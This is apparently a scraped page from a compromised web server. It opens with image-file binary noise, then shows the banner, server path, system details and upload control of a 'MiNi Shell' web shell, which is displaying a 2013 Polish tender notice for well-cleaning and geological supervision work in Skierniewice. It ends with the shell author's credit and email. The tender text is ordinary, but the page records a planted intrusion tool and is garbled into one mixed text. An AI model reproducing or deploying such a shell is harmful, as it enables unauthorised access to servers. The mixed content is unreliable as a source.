JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130729/300756-N-2013.html

<p class="kh_header"><b>Skierniewice: Cz. I - Wykonanie robót geologicznych dla ustalenia stanu technicznego i wydajności otworów studziennych, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach wraz z pracami przygotowawczymi
Cz. II -Nadzór geologiczny nad wykonaniem  robót geologicznych dla ustalenia stanu technicznego i wydajności otworów studziennych, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach</b><br>
<b>Numer ogłoszenia: 300756 - 2013; data zamieszczenia: 29.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji "WOD-KAN" Sp. z o.o. , Mokra Prawa 30, 96-100 Skierniewice, woj. łódzkie, tel. 046 8333808, faks 046 8334668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodkan-skierniewice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Cz. I - Wykonanie robót geologicznych dla ustalenia stanu technicznego i wydajności otworów studziennych, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach wraz z pracami przygotowawczymi
Cz. II -Nadzór geologiczny nad wykonaniem  robót geologicznych dla ustalenia stanu technicznego i wydajności otworów studziennych, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cz. I - Wykonanie robót geologicznych dla ustalenia stanu technicznego i wydajności otworów studziennych, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach wraz z pracami przygotowawczymi . Zakres zadania obejmuje wykonanie następujących  prac:
1.Prace przygotowawcze  w tym:
1.1.przygotowanie terenu pod ułożenie rurociągu odprowadzającego wodę z próbnego pompowania , obejmujące m.in. wycinkę drzew i krzewów:
1.1.1.	Wykonawca poinformuje Zamawiającego o terminie wejścia na poszczególne działki celu rozpoczęcia wycinki drzew za pomocą fax lub pisemnie w terminie 3 dni przed wejściem na teren danej działki.
 1.1.2.	Wykonawca powiadomi pisemne właścicieli gruntów, z wyprzedzeniem 14 -dniowym o zamierzonym terminie wejścia na teren nieruchomości w celu wykonania prac przygotowawczych, m.in. wycinki drzew i krzewów oraz planowanym terminie zejścia po ich uporządkowaniu. 
1.1.3.	Wykonawca uporządkuje teren po wycince drzew i krzewów. Drewno z wycinki Wykonawca przekaże właścicielowi gruntu lub w przypadku braku jego zgody na odbiór drewna, usunie z działki na własny koszt.
1.1.4.	Zamawiający przekaże Wykonawcy następujące dokumenty po podpisaniu umowy: 
- zgodę właścicieli działek o nr ewid. 671, 669,673,675 i 678 na wycinkę drzew (samosiewów) oraz samosiewów krzewów, których wiek nie przekracza 10 lat.
- zezwolenie Prezydenta Miasta Skierniewice na wycięcie 7 szt. drzew (samosiewy) rosnących na działce nr 683
- zgody właścicieli działek na wejście na teren nieruchomości, w celu przeprowadzenia prac.
- decyzję zatwierdzającą projekt prac geologicznych, najpóźniej do 31 sierpnia 2013r,  
1.2.wyczyszczenie rowu melioracyjnego w celu udrożnienia i stawu, przez które będzie odprowadzana woda po próbnym pompowaniu z otworu studziennego nr I4 obejmujące: 
a) udrożnienie rowu melioracyjnego o szerokość dna rowu 60 [cm] poprzez odmulenie z ok. 30 [cm] osadów na odcinku 50 [mb] ( od stawu w górę biegu rowu), wykoszenie traw i trzcin ze skarp;
b) odmulenie przepustu  O 60 cm , dł. 10 mb., zamulenie 2/3 O;
c) odmulenie dna stawu na odcinku 30 m, o łącznej długości brzegów stawu   80 m, na szerokość dna 2m od brzegu, zamulenie 30 cm z wykoszeniem traw i trzcin,
d) rozplantowanie ziemi z zamulenia stawu na brzegu skarpy - 80 mb.,
e) odkopanie i zlikwidowanie przecieków na piętrzeniu ( np. folia, beton) na odcinku 2 mb.
W/w prace należy wykonać przed rozpoczęciem pompowania wody, aby zapewnić swobodny przepływ wody i wykonywać je ręcznie lub w inny sposób uzgodniony z zarządem Rodzinnego Ogrodu Działkowego im. F. Kotowskiego, na którym zlokalizowany jest rów i staw.
Wykonawca obowiązany jest powiadomić zarząd Rodzinnego Ogrodu Działkowego o planowanym terminie rozpoczęcia prac - z wyprzedzeniem 7 dniowym.
1.3.Ułożenie tymczasowych rurociągów tłocznych odprowadzających wodę z pompowania próbnego, poprzez rów do zalewu na rzece Łupi. Łączna długość rurociągów tłocznych wynosi 905 +- 10 [mb] PE 200 mm, PE-100, PN 10, SDR 17. Rurociągi będą ułożone na powierzchni terenu, po terenie nieutwardzonym, stanowiącym grunty rolnicze i nieużytki porośnięte częściowo drzewami i krzewami. Zakup rurociągu leży po stronie Wykonawcy.
W zakres prac wchodzi umocnienie dna oraz bocznych ścian rowu melioracyjnego na dł. 5 mb.- w miejscu zrzutu wody z pompowania otworu studziennego nr I4 oraz z otworów  nr I2 i I3.
1.4.Zapewnienie energii elektrycznej dla celów pompowania, zgodnie z opisem w projekcie robót geologicznych.
2.Czyszczenie otworów studziennych i pompowania pomiarowe (otwory nr I2, I3 i I4) obejmuje następujące prace:
2.1.Powiadomienie zarządcy rowu (Zarząd Melioracji i Urządzeń Wodnych w Łodzi Terenowy Inspektorat w Rawie Mazowieckiej) o zamierzonym odprowadzeniu wody z pompowań otworów studziennych do rowu (z przekazaniem do wiadomości Zamawiającemu);
2.2.Powiadomienie geologa sprawującego nadzór o terminie przystąpienia do realizacji części I pkt. 2.
2.3.Dokonanie pomiaru głębokości otworu I2 i sprawdzenie jego drożności poniżej głębokości 496 m p.p.t. do dna otworu na głębokości 600 m.;
2.4.Przeprowadzenie czyszczenia otworów studziennych I2, I3 i I4 zgodnie z opisem przedmiotu zamówienia.
2.5.Wykonanie kamerowania otworu studziennego I2, I3 i I4 na całej długości dla potwierdzenia właściwego oczyszczenia otworu i skuteczności przeprowadzonych zabiegów.
2.6.Odkażenie każdego otworu wodnym roztworem podchlorynu sodu lub wapna.
2.7.Pompowanie pomiarowe (I i II faza), zgodnie z opisem przedmiotu zamówienia.
2.8.Wykonanie drugiego kamerowania po skończonym pompowaniu w celu ustalenia ostatecznego zasypu studni oraz głębokości studni.
2.9.Prace zakończeniowe określone w opisie przedmiotu zamówienia.
Szczegółowy opis przedmiotu zamówienia dla cz. I zawarty jest w załączniku nr 1a SIWZ  oraz  w projekcie umowy załączniku nr 7a SIWZ.
Cz. II - Nadzór geologiczny nad wykonaniem  robót geologicznych dla ustalenia stanu technicznego i wydajności otworów studziennych, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach.1.Przedmiotem zamówienia jest nadzór geologiczny nad robotami geologicznymi dla ustalenia stanu technicznego i wydajności otworów studziennych nr I2, I3 i I4, dolnokredowych w rejonie ul. Rawskiej w Skierniewicach, obejmującymi:
a.oczyszczenie otworów studziennych I2, I3 i I4 z zasypu i resztek płuczki wiertnicznej pokrywającej ściany kolumny filtrowej i osłonowej w celu doprowadzenie otworów studziennych do pełnej sprawności technicznej i stanu umożliwiającego podjęcie ich eksploatacji;
b.wykonanie krótkotrwałych, 4-stopniowych pompowań pomiarowych oddzielnie dla każdej studni dla oceny ich aktualnej sprawności technicznej i maksymalnej wydajności;
c.wykonanie pojedynczych pompowań pomiarowych w ruchu nieustalonym na jednym stopniu wydajności (zbliżonej do maksymalnej) w otworze I2 i I3 dla oceny parametrów hydrogeologicznych ujętego poziomu wodonośnego oraz wstępnej oceny możliwego zasięgu oddziaływania eksploatacji ujęcia; 
2)Do zadań geologa nadzorującego będzie należało miedzy innymi: 
1.Opracowanie instrukcji roboczej określającej: szczegółowy zakres prac, tok pompowania oczyszczającego oraz pompowania pomiarowego przy uwzględnieniu doświadczenia i posiadanego sprzętu przez Wykonawcę robót. 
2.Bieżąca kontrola i nadzór nad realizacją prac oczyszczających i pompowań w otworach zgodnie z zatwierdzonym projektem prac geologicznych.
3.Prowadzenie pomiarów i badań w otworach zgodnie z zatwierdzonym projektem (pomiary zwierciadła wody, bieżące analizy parametrów fizyko-chemicznych pompowanych wód, pobór prób wody do analiz laboratoryjnych - uwaga: analizy mogą być wykonywane tylko przez laboratorium posiadające akredytację w zakresie wszystkich wskaźników określonych w Projekcie robót geologicznych , analizy zawartości piasku w pompowanej wodzie, wykonanie pomiaru natężenia wypływu wody za pomocą wodomierza, pomiaru zwierciadła wody w otworze pompowanym za pomocą elektronicznego czujnika zmian zwierciadła z automatyczną rejestracją odczytów według zadanego kroku czasowego, zaś w pozostałych obserwowanych otworach dopuszcza się zastosowanie do pomiarów gwizdka hydrogeologicznego lub czujnika elektrycznego z taśmą mierniczą),
4.Prowadzenie bieżącej analizy i wyników pompowań w celu ich korygowania i podejmowania decyzji o ich zaprzestaniu lub kontynuacji.
5.Udział w komisji odbioru prac oczyszczających i diagnostycznych otworów studziennych realizowanych przez firmę wiertniczą.
6.Przygotowania sprawozdania ( w tym dziennik z próbnego pompowania) z prac i badań wykonanych w otworach studziennych ujęcia Rawska, zawierającego wyniki i informacje z przeprowadzonych pompowań oczyszczających i pomiarowych, badań parametrów fizyko-chemicznych wody, pomiarów zwierciadła wody, wyniki obliczeń sprawności i wydajności otworów studziennych w zakresie niezbędnym do opracowania dokumentacji hydrogeologicznej dla ustalenia zasobów eksploatacyjnych w/w ujęcia wód podziemnych (ewentualnie zakwalifikować otwór studzienny do rekonstrukcji lub likwidacji). 
3) Szczegółowy opis zakresu i sposobu wykonania prac zawarty jest w Projekcie prac geologicznych dla ustalenia zasobów eksploatacyjnych wielootworowego ujęcia wód podziemnych ujmującego dolnokredowy poziom wodonośny w rejonie ulicy Rawskiej w SKIERNIEWICACH oprac. przez HYDROEKO - Biuro Poszukiwań i Ochrony Wód Andrzej Rodzoch 02-796 Warszawa, ul. Wąwozowa 25 lok. 48 oraz specyfikacji istotnych warunków zamówienia, które stanowią integralną część niniejszego opisu.
 Szczegółowy opis przedmiotu zamówienia dla cz. II zawarty jest w załączniku nr 1b SIWZ  oraz w projekcie umowy załączniku nr 7b SIWZ.
Uwaga!
Wykonawca części I przedmiotu zamówienia nie może być jednocześnie Wykonawcą części II przedmiotu zamówienia.
Termin wykonania zamówienia dla cz. I i II przedmiotu zamówienia ustala się na okres od dnia podpisania umowy do 30.11.2013r., w tym:
dla część I
- prace przygotowawcze - udrożnienie rowu melioracyjnego i stawu:  sierpień 2013r,
- prace przygotowawcze - wycinka drzew i krzewów: wrzesień-październik 2013r
- czyszczenie otworów i pompowanie: wrzesień-październik 2013r. otwór nr III i IV
- czyszczenie otworów i pompowanie : do 30 listopada 2013r. otwór nr II
dla część II
-nadzór geologiczny: wrzesień-listopad 2013r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.33.50.00-5, 45.11.20.00-5, 77.21.14.00-6, 71.35.12.20-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: cz. I przedmiotu zamówienia 5 370,00 zł. (słownie złotych: pięć tysięcy trzysta siedemdziesiąt 00/100)
cz. II przedmiotu zamówienia: 320,00 zł. (słownie złotych: trzysta dwadzieścia 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek jeżeli Wykonawca: dla cz. I przedmiotu zamówienia: - wykonał w okresie ostatnich trzech lat  przed upływem terminu składania ofert ( a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 1 pompowanie  otworów studziennych lub rekonstrukcji lub usprawnień studni o wydajności co najmniej 200 m3/h,
dla cz. II przedmiotu zamówienia:
- prowadził w okresie ostatnich trzech lat  przed upływem terminu składania ofert ( a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 1 nadzór geologiczny przy renowacji lub rekonstrukcji otworów studziennych o głębokości ponad 500 [m].
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentów i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek jeżeli Wykonawca: dla cz. I przedmiotu zamówienia: 
dysponuje sprzętem umożliwiającym wykonanie mechanicznego czyszczenia (szczotkowania) otworów o głębokości do 600 m oraz sprzętem umożliwiającym prowadzenie pompowań oczyszczających metodą air - lift oraz pompami głębinowymi z wydajnością co najmniej 200 m3/h. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek jeżeli Wykonawca: dla cz. I przedmiotu zamówienia dysponuje osobami posiadającymi uprawnienia wynikające z obowiązujących przepisów, w tym Prawa geologicznego i górniczego do kierowania i wykonywania prac objętych zamówieniem; dla cz. II przedmiotu zamówienia  dysponuje geologiem posiadającym uprawnienia geologiczne kat. V, stosownie do przepisów Prawa Geologicznego i Górniczego.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentów i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i załączniki: - Szczegółowy opis przedmiotu zamówienia cz. I i cz. II  - załącznik nr 1a i 1b do SIWZ
- Wzór formularza ofertowego - załącznik nr 2 do SIWZ
- Formularz cenowy - załącznik nr 3a cz. I i zał. 3b cz. II 
- Projekt umowy - załącznik nr 7a cz. I i zał. 7b cz. II do SIWZ
- Oświadczenie Wykonawcy o dysponowaniu sprzętem umożliwiającym wykonanie mechanicznego czyszczenia (szczotkowania) otworów o głębokości do 600 m oraz sprzętem umożliwiającym prowadzenie pompowań oczyszczających metodą air - lift oraz pompami głębinowymi z wydajnością co najmniej 200 m3/h  - załącznik nr 10 cz. I.
-Dokumenty wymienione w rozdz. 6 SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
a)zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie części przedmiotu umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,
b)zmiany stawek podatku od towarów i usług,
c)zamiany nazwy (firmy), siedziby albo miejsca zamieszkania i adresu wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodkan-skierniewice.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji WOD-KAN Sp. z o.o., 96-100 Skierniewice, Mokra Prawa 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2013 godzina 12:00, miejsce: Siedziba Zamawiającego- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com